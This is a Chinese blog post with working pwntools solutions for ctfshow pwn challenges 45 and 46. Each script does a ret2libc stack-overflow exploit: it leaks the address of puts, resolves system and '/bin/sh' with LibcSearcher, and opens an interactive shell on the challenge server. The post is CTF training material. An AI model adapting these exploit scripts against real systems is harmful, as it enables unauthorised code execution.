ctfshow pwn45~46

于 2025-03-31 00:42:50 发布
阅读量189 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46570843/article/details/146782007

pwn 45

from pwn import *
from LibcSearcher import *

elf_path = './pwn'
elf = ELF(elf_path)
p = remote('pwn.challenge.ctf.show', 28115)

padding = 0x6B+4
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ctfshow = elf.sym['ctfshow']

payload = flat([cyclic(padding), puts_plt, ctfshow, puts_got])
p.sendline(payload)

real_addr = u32(p.recvuntil(b'\xf7')[-4:])
libc = LibcSearcher("puts", real_addr)
libc_base = real_addr - libc.dump('puts')
system_addr = libc.dump('system') + libc_base
bin_sh = libc_base + libc.dump('str_bin_sh')
payload = flat([cyclic(padding), system_addr, b'a'*4, bin_sh])
p.sendline(payload)
p.interactive()

pwn46

from pwn import *
from LibcSearcher import LibcSearcher

elf = ELF('./pwn46')
p = remote('pwn.challenge.ctf.show', 28171)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ctfshow_addr = elf.symbols['ctfshow']

offset = 0x70 + 8
ret_addr = 0x4004fe
rdi_ret = 0x400803

payload = offset*b'a'+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(ctfshow_addr)
p.sendline(payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')

system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
payload = offset*b'a'+p64(ret_addr)+p64(rdi_ret)+p64(bin_sh_addr)+p64(system_addr)+p64(ctfshow_addr)
p.sendline(payload)
p.interactive()

第一个payload不需要ret,因为puts函数对栈平衡的要求不高,加了反而崩溃

Bagarkk
关注
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2449
本文主要详解CTFshowpwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
ctfshow做题笔记—栈溢出—pwn45~pwn48
Yilanchia的博客
02-10 845
但是怎么都timeout,偏移量是重新用pwndbg调试出来的,看来确实有点小错误。于是去学习了一些其他大佬的写法,也学到了一些应对办法。两天没更了,因为打了VNCFTF,还是太弱了,只能做一道异形文字的misc就结束了,pwn一直打不通(先打开ida瞅瞅,其实题目也说了无system无/bin/sh。没有write了,试试用puts吧,更简单了呢。被上一道题硬控半天,这道题不会也要被硬控吧。哎呦,确实可以,也算是对模板越来越熟悉了。由于lib库已经装在本地,省大事了。),于是沉默一天,还是继续学习吧。
ctfshow pwn45
saulgoodman的博客
07-06 343
简单的ret2libc。
CTFshow-pwn入门-栈溢出pwn43-pwn44
你们de4月天的博客
12-27 1868
CTFshow-pwn入门-栈溢出pwn43-pwn44
ctfshow pwn44
saulgoodman的博客
07-06 201
【代码】ctfshow pwn44。
ctfshow pwn wp
Chandra的学习之路
11-26 1039
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1630
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow刷题笔记—栈溢出—pwn53~pwn56
Yilanchia的博客
02-19 783
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 3875
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
ctfshow 命令执行46关到70关 解题思路 理解及答案
2301_78362619的博客
12-28 1898
ctfshow我看行
Ctfshow web入门-web45 WP
qq_45427131的博客
05-18 291
web45 关于黑洞的传送门 传送门1 传送门2 preg_match函数多了对空格的过滤 空格可以用${IFS}和%0a代替绕过过滤 常规的后面一个变量写入黑洞,直接构造payload: http://9e400eba-95d3-409c-b50a-451ff5a2d4a2.challenge.ctf.show:8080/?c=ls%26%26ls 用${IFS}代替空格,构造payload ...
CTFshow-PWN-栈溢出(pwn45
Welcome To Myon'Blog !
05-20 1487
我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。system 函数属于libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的,即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。PLT用于间接调用共享库中的函数。这些方法和函数通常用于在漏洞利用过程中查找特定函数的地址(例如 system 函数)或特定字符串的地址(例如 /bin/sh 字符串)。
ctfshowpwn 45 -> 90(已更新33)栈溢出
2302_77659150的博客
10-20 2318
ctfshow pwn题的最新(2024)可用代码
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5523
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow部分wp
西部壮仔的博客
11-10 2967
web 签到观己WEB_AK赛 源码: <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); } }else{ highlight_file(__FILE__); } ?> 直接包含上传进度就行 import request
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8744
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
用 10 行代码实现边缘端的图像识别功能
最新发布
08-05
资源下载链接为: https://pan.quark.cn/s/2e7a8b16941c 用 10 行代码实现边缘端的图像识别功能(最新、最全版本!打开链接下载即可用!)
基于STM32F103C8T6微控制器的2024年全国大学生电子设计竞赛H题自动行驶小车完整实现项目_包含HAL库驱动开发_电机控制_红外循迹_超声波避障_OLED显示_蓝牙遥控_.zip
08-05
基于STM32F103C8T6微控制器的2024年全国大学生电子设计竞赛H题自动行驶小车完整实现项目_包含HAL库驱动开发_电机控制_红外循迹_超声波避障_OLED显示_蓝牙遥控_.zip
errorlink问题定位
08-05
errorlink问题定位
ctfshow pwn
08-07
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,利用它们来获取系统控制权,并完成指定的任务。这个领域需要对二进制程序分析、漏洞挖掘、堆栈溢出、ROP链构造等技术有一定的了解和实践经验。如果你对具体的题目或技术有更具体的问题,我可以帮你进一步解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值